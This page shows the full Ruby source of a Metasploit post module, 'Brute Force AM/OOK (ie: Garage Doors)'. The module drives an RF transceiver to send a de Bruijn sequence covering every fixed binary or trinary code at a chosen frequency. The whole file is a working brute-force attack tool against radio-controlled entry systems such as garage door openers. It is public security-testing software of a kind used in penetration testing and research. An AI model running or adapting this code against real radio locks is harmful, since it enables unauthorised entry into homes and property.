Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/hardware/rftransceiver/rfpwnon.rb
Views: 11623
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Hardware::RFTransceiver::RFTransceiver78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Brute Force AM/OOK (ie: Garage Doors)',13'Description' => %q{14Post Module for HWBridge RFTranscievers. Brute forces AM OOK or raw15binary signals. This is a port of the rfpwnon tool by Corey Harding.16(https://github.com/exploitagency/github-rfpwnon/blob/master/rfpwnon.py)17},18'License' => MSF_LICENSE,19'Author' => ['Craig Smith'],20'Platform' => ['hardware'],21'SessionTypes' => ['hwbridge']22)23)24register_options([25OptInt.new('FREQ', [true, 'Frequency to transmit on']),26OptInt.new('BAUD', [false, 'Baud rate to use', 2000]),27OptInt.new('BINLENGTH', [false, 'Binary Length of signal to brute force', 8]),28OptInt.new('REPEAT', [false, 'Number of times to repeat the signal', 5]),29OptString.new('PPAD', [false, 'Specify your own binary padding before the brute forced binary', nil]),30OptString.new('TPAD', [false, 'Specify your own binary padding after the brute forced binary', nil]),31OptBool.new('RAW', [false, 'When set, disables PWM encoding. BINLENGTH must be -1', false]),32OptBool.new('TRI', [false, 'When set, brute foces a trinary signal.', false]),33OptBool.new('EXTRAVERBOSE', [false, 'More verbose', false]),34OptInt.new('INDEX', [false, 'USB Index to use', 0]),35OptInt.new('DELAY', [false, 'Delay in milliseconds between transmissions', 500])36])37@zeropwm = '1110'38@onepwm = '1000'39@brutechar = '01'40end4142# @param key [String] binary/trinary represntation43# @return [Array] ByteArray44def convert_ook(key)45pwm_str_key = ''46key.each_char do |k|47x = '*'48case k49when '0'50x = @zeropwm51when '1'52x = @onepwm53when '2'54x = @twopwm55end56pwm_str_key += x57end58return pwm_str_key.scan(/.{1,8}/).collect { |x| x.to_i(2).chr }59end6061def debruijn_bytes(k, n)62@a = [0]63@sequence = []64debruijn(1, 1, k, n)65return @sequence.join66end6768def debruijn(t, p, k, n)69if t > n70if n % p == 0711.upto(p) { |j| @sequence << @a[j] }72end73else74@a[t] = @a[t - p]75debruijn(t + 1, p, k, n)76(@a[t - p] + 1).upto(k - 1) do |j|77@a[t] = j78debruijn(t + 1, t, k, n)79end80end81end8283def run84unless is_rf?85print_error('Not an RF Transceiver')86return87end88unless set_index(datastore['INDEX'])89print_error("Couldn't set usb index to #{datastore['INDEX']}")90return91end92if datastore['TRI']93@zeropwm = '10001000'94@onepwm = '11101110'95@twopwm = '10001110'96@brutechar = '012'97end9899set_modulation('ASK/OOK')100set_freq(datastore['FREQ'])101set_sync_mode(0)102set_baud(datastore['BAUD'])103max_power104105print_status('Generating de bruijn sequence...')106seq = debruijn_bytes(@brutechar.length, datastore['BINLENGTH'])107tail = seq[0, datastore['BINLENGTH'] - 1]108brutepacket = seq + tail109110print_status("Brute forcing frequency: #{datastore['FREQ']}")111print_status("Padding before binary: #{datastore['PPAD']}") if datastore['PPAD']112print_status("Padding after binary: #{datastore['TPAD']}") if datastore['TPAD']113print_status("De Bruijin Sequence: #{brutepacket}") if datastore['EXTRAVERBOSE']114115startn = 0116endy = 512117brutepackettmp = ''118addr = 512119if datastore['TRI']120endy = 128121addr = 128122end123if datastore['REPEAT'] >= 2 || datastore['PPAD'] || datastore['TPAD']124endy = datastore['BINLENGTH']125addr = 1126end127# Transmit128while startn < brutepacket.length129(0..datastore['REPEAT'] - 1).each do |_i|130brutepackettemp = brutepacket[startn..endy - 1]131next if brutepackettemp.length < datastore['BINLENGTH']132133# Pad if asked to134brutepackettemp = datastore['PPAD'] + brutepackettemp if datastore['PPAD']135brutepackettemp += datastore['TPAD'] if datastore['TPAD']136if datastore['RAW']137key_packed = brutepackettemp.scan(/.{1,8}/).collect { |x| x.to_i(2).chr }138else139key_packed = convert_ook(brutepackettemp)140end141print_status('Transmitting...')142set_flen(key_packed.length)143rfxmit(key_packed.join)144print_status('Binary before PWM encoding:')145print_status(brutepackettemp.to_s)146print_status('Binary after PWM encoding:')147print_status(key_packed.join.unpack('H*')[0].hex.to_s(2).to_s)148sleep(datastore['DELAY'] / 1000) if datastore['DELAY'] > 0149end150if (datastore['REPEAT'] >= 2) || datastore['PPAD'] || datastore['TPAD']151startn += addr152endy += addr153else154startn = startn + addr - datastore['BINLENGTH']155endy = endy + addr - datastore['BINLENGTH']156end157end158print_status('Done')159set_mode('IDLE')160end161end162163164